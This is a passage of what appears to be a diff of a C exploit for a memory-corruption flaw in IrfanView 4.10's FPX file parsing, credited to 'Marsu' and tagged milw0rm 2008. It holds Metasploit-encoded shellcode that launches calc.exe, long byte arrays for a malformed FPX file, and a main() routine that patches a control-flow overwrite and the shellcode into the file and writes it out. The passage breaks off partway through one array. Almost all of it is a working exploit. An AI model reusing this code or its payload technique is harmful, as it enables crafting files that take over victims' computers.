-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xfc\xfc\xfc\xf8\xf8" -"\xf8\xf1\xf1\xf1\xf4\xf4\xf4\xf3\xf4\xf4\xf8\xf8\xf8\xfa\xfa\xfa" -"\xf5\xf5\xf5\xf5\xf5\xf5\xf7\xf7\xf7\xf7\xf7\xf7\xf5\xf5\xf5\xf5" -"\xf5\xf5\xfb\xfb\xfb\xff\xff\xff\xfe\xfe\xfe\xf5\xf5\xf5\xf6\xf6" -"\xf7\xfd\xfd\xfd\xf2\xf2\xf2\xf9\xf9\xf9\xfb\xfb\xfb\xf7\xf7\xf7" -"\xf3\xf3\xf3\xfb\xfc\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xf2\xf2\xf2\xd7\xd7\xd7\xd7\xd7\xd7\xcf\xcf" -"\xcf\xc7\xc8\xc7\xcc\xcd\xcd\xca\xca\xcb\xca\xca\xca\xd3\xd3\xd4" -"\xcc\xcd\xcd\xc7\xc8\xc8\xc4\xc5\xc5\xd4\xd5\xd5\xc4\xc4\xc4\xc7" -"\xc8\xc7\xdb\xdc\xdb\xbe\xbf\xbf\xba\xbb\xbc\xc2\xc3\xc4\xd0\xd1" -"\xd2\xef\xef\xef\xc6\xc6\xc6\xcc\xcd\xcd\xdb\xdb\xdc\xc9\xca\xc9" -"\xc6\xc6\xc6\xe7\xe7\xe7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xf7\xf7\xf7\xbf\xbf\xc0\xa4\xa5\xa6\xb0\xb1" -"\xb0\xbd\xbe\xbd\xc3\xc4\xc5\xc1\xc2\xc2\xaf\xaf\xb0\xb2\xb3\xb4" -"\xb4\xb5\xb6\xb4\xb5\xb5\xb7\xb7\xb7\xca\xcb\xcc\xac\xae\xad\xae" -"\xb0\xaf\xbe\xbe\xbe\x94\x95\x94\xe5\xe5\xe6\xaa\xab\xab\xba\xbb" -"\xbc\xe4\xe4\xe5\xd3\xd4\xd4\xb3\xb3\xb3\xb0\xb0\xb0\xb9\xba\xba" -"\xc0\xc1\xc2\xe7\xe7\xe8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfd\xfd\xfc\xfc" -"\xfc\xfb\xfb\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
-"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xf4\xf4\xf4\xfd\xfd\xfd\xfd\xfd\xfd\xfa\xfa\xfa" -"\xf2\xf2\xf2\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" -"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x03\x00\x01\x00\x03\x00" -"\x02\x00\x03\x00\x13\x10\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00" -"\x03\x00\x00\x00\x04\x00\x00\x00"; - - - -int main(int argc, char* argv[]) -{ - FILE* fpxfile; - char evilbuff[110000]; - int offset=0; - - printf("[+] Irfanview 4.10 .FPX File Memory Corruption\n"); - printf("[+] Coded and discovered by Marsu \n"); - if (argc!=2) { - printf("[+] Usage: %s \n",argv[0]); - return 0; - } - - memset(evilbuff,0,110000); - memcpy(evilbuff,FPX_file1,sizeof(FPX_file1)-1); - offset=sizeof(FPX_file1)-1; - 
memcpy(evilbuff+offset,FPX_file2,sizeof(FPX_file2)-1); - offset+=sizeof(FPX_file2)-1; - memcpy(evilbuff+offset,FPX_file3,sizeof(FPX_file3)-1); - offset+=sizeof(FPX_file3)-1; - memcpy(evilbuff+offset,FPX_file4,sizeof(FPX_file4)-1); - offset+=sizeof(FPX_file4)-1; - memcpy(evilbuff+offset,FPX_file5,sizeof(FPX_file5)-1); - offset+=sizeof(FPX_file5)-1; - memcpy(evilbuff+offset,FPX_file6,sizeof(FPX_file6)-1); - offset+=sizeof(FPX_file6)-1; - memcpy(evilbuff+offset,FPX_file7,sizeof(FPX_file7)-1); - offset+=sizeof(FPX_file7)-1; - memcpy(evilbuff+offset,FPX_file8,sizeof(FPX_file8)-1); - offset+=sizeof(FPX_file8)-1; - - memcpy(evilbuff+0x5c3a,"\x90\xeb\x07\xcc\x56\x7B\x01\x10\x41\x41\x41\x41",12); //change this to debug - memcpy(evilbuff+0x5c3a+12,CalcShellcode,sizeof(CalcShellcode)-1); - - printf("[+] FPX file patched!\n"); - - if ((fpxfile=fopen(argv[1],"wb"))==0) { - printf("[-] Unable to access file.\n"); - return 0; - } - - fwrite( evilbuff, 1, 102952, fpxfile ); - fclose(fpxfile); - printf("[+] Done. Have fun!\n"); - return 0; -} - -// milw0rm.com [2008-01-28] +/*************************************************************************** +* IrfanView 4.10 .FPX File Memory Corruption * +* * +* This exploit launches calc.exe. * +* * +* Tested against Win XP SP2 FR. * +* Have Fun! * +* * +* Coded and discovered by Marsu * +* * +* Other bugs exist... 
* +***************************************************************************/ + +#include "stdio.h" +#include "stdlib.h" +#include "string.h" + +/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */ +unsigned char CalcShellcode[] = +"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26" +"\x45\x32\xe3\x83\xeb\xfc\xe2\xf4\xda\xad\x76\xe3\x26\x45\xb9\xa6" +"\x1a\xce\x4e\xe6\x5e\x44\xdd\x68\x69\x5d\xb9\xbc\x06\x44\xd9\xaa" +"\xad\x71\xb9\xe2\xc8\x74\xf2\x7a\x8a\xc1\xf2\x97\x21\x84\xf8\xee" +"\x27\x87\xd9\x17\x1d\x11\x16\xe7\x53\xa0\xb9\xbc\x02\x44\xd9\x85" +"\xad\x49\x79\x68\x79\x59\x33\x08\xad\x59\xb9\xe2\xcd\xcc\x6e\xc7" +"\x22\x86\x03\x23\x42\xce\x72\xd3\xa3\x85\x4a\xef\xad\x05\x3e\x68" +"\x56\x59\x9f\x68\x4e\x4d\xd9\xea\xad\xc5\x82\xe3\x26\x45\xb9\x8b" +"\x1a\x1a\x03\x15\x46\x13\xbb\x1b\xa5\x85\x49\xb3\x4e\x3b\xea\x01" +"\x55\x2d\xaa\x1d\xac\x4b\x65\x1c\xc1\x26\x53\x8f\x45\x6b\x57\x9b" +"\x43\x45\x32\xe3"; + +unsigned char FPX_file1[] = +"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x3e\x00\x03\x00\xfe\xff\x09\x00" +"\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" +"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00" +"\x02\x00\x00\x00\xfe\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00" +"\x65\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xfd\xff\xff\xff\x04\x00\x00\x00\x97\x00\x00\x00\x05\x00\x00\x00" +"\x06\x00\x00\x00\x07\x00\x00\x00\x08\x00\x00\x00\x09\x00\x00\x00" +"\x13\x00\x00\x00\x0a\x00\x00\x00\x0b\x00\x00\x00\x0c\x00\x00\x00" +"\x0d\x00\x00\x00\x0e\x00\x00\x00\x0f\x00\x00\x00\x10\x00\x00\x00" +"\x11\x00\x00\x00\x12\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00" +"\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00" +"\x19\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00" +"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00" +"\x21\x00\x00\x00\x22\x00\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00" +"\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00" +"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00" 
+"\x2d\x00\x00\x00\x2e\x00\x00\x00\x31\x00\x00\x00\x95\x00\x00\x00" +"\xfe\xff\xff\xff\x32\x00\x00\x00\x33\x00\x00\x00\x36\x00\x00\x00" +"\x35\x00\x00\x00\x41\x00\x00\x00\x27\x00\x00\x00\x34\x00\x00\x00" +"\x39\x00\x00\x00\x3a\x00\x00\x00\x3b\x00\x00\x00\x3c\x00\x00\x00" +"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00" +"\x4d\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00\x00\x00" +"\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00" +"\x49\x00\x00\x00\x4a\x00\x00\x00\x4b\x00\x00\x00\x4c\x00\x00\x00" +"\x4e\x00\x00\x00\x50\x00\x00\x00\x4f\x00\x00\x00\x51\x00\x00\x00" +"\x54\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x56\x00\x00\x00" +"\x55\x00\x00\x00\x58\x00\x00\x00\x57\x00\x00\x00\x59\x00\x00\x00" +"\x5b\x00\x00\x00\x5a\x00\x00\x00\x5c\x00\x00\x00\x61\x00\x00\x00" +"\x5d\x00\x00\x00\x5e\x00\x00\x00\x5f\x00\x00\x00\x60\x00\x00\x00" +"\x62\x00\x00\x00\x64\x00\x00\x00\x63\x00\x00\x00\xfe\xff\xff\xff" +"\xfe\xff\xff\xff\xfd\xff\xff\xff\x67\x00\x00\x00\x68\x00\x00\x00" +"\x69\x00\x00\x00\x6a\x00\x00\x00\x6b\x00\x00\x00\x6c\x00\x00\x00" +"\x6d\x00\x00\x00\x6e\x00\x00\x00\x6f\x00\x00\x00\x70\x00\x00\x00" +"\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00" +"\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00\x00\x00\x78\x00\x00\x00" +"\x79\x00\x00\x00\x7a\x00\x00\x00\x7b\x00\x00\x00\x7c\x00\x00\x00" +"\x7d\x00\x00\x00\x7e\x00\x00\x00\x7f\x00\x00\x00\x80\x00\x00\x00" +"\x52\x00\x6f\x00\x6f\x00\x74\x00\x20\x00\x45\x00\x6e\x00\x74\x00" +"\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x16\x00\x05\x00\xff\xff\xff\xff\xff\xff\xff\xff\x03\x00\x00\x00" +"\x00\x67\x61\x56\x54\xc1\xce\x11\x85\x53\x00\xaa\x00\xa1\xf9\x5b" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x68\xb8\x3b" +"\x79\x7f\xc7\x01\x03\x00\x00\x00\x40\x22\x00\x00\x00\x00\x00\x00" 
+"\x05\x00\x53\x00\x75\x00\x6d\x00\x6d\x00\x61\x00\x72\x00\x79\x00" +"\x49\x00\x6e\x00\x66\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x74\x00" +"\x69\x00\x6f\x00\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x28\x00\x02\x01\x16\x00\x00\x00\x05\x00\x00\x00\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x66\x00\x00\x00\x48\x5d\x00\x00\x00\x00\x00\x00" +"\x05\x00\x47\x00\x6c\x00\x6f\x00\x62\x00\x61\x00\x6c\x00\x20\x00" +"\x49\x00\x6e\x00\x66\x00\x6f\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x1a\x00\x02\x00\x04\x00\x00\x00\x09\x00\x00\x00\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x0c\x00\x00\x00\x8c\x00\x00\x00\x00\x00\x00\x00" +"\x05\x00\x44\x00\x61\x00\x74\x00\x61\x00\x20\x00\x4f\x00\x62\x00" +"\x6a\x00\x65\x00\x63\x00\x74\x00\x20\x00\x30\x00\x30\x00\x30\x00" +"\x30\x00\x30\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x28\x00\x02\x01\x02\x00\x00\x00\x01\x00\x00\x00\xff\xff\xff\xff" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +"\x00\x00\x00\x00\x0e\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00" +"\xfe\xff\xff\xff\xfe\xff\xff\xff\x03\x00\x00\x00\x61\x00\x00\x00" +"\x05\x00\x00\x00\xfe\xff\xff\xff\x07\x00\x00\x00\x08\x00\x00\x00" +"\x09\x00\x00\x00\x85\x00\x00\x00\x0b\x00\x00\x00\xfe\xff\xff\xff" +"\x0d\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x01\x00\x00\x00" +"\x11\x00\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00" 
+"\x62\x00\x00\x00\x16\x00\x00\x00\x19\x00\x00\x00\x71\x00\x00\x00" +"\x22\x00\x00\x00\x1a\x00\x00\x00\x1b\x00\x00\x00\x1c\x00\x00\x00" +"\x1d\x00\x00\x00\x1e\x00\x00\x00\x1f\x00\x00\x00\x20\x00\x00\x00" +"\x21\x00\x00\x00\x58\x00\x00\x00\x23\x00\x00\x00\x25\x00\x00\x00" +"\x7f\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00" +"\x29\x00\x00\x00\x2a\x00\x00\x00\x2b\x00\x00\x00\x2c\x00\x00\x00" +"\x2d\x00\x00\x00\x2e\x00\x00\x00\x2f\x00\x00\x00\x30\x00\x00\x00" +"\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00\x00\x00\x34\x00\x00\x00" +"\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00" +"\x39\x00\x00\x00\x3a\x00\x00\x00\xfe\xff\xff\xff\x3c\x00\x00\x00" +"\x3d\x00\x00\x00\x3e\x00\x00\x00\x3f\x00\x00\x00\x40\x00\x00\x00" 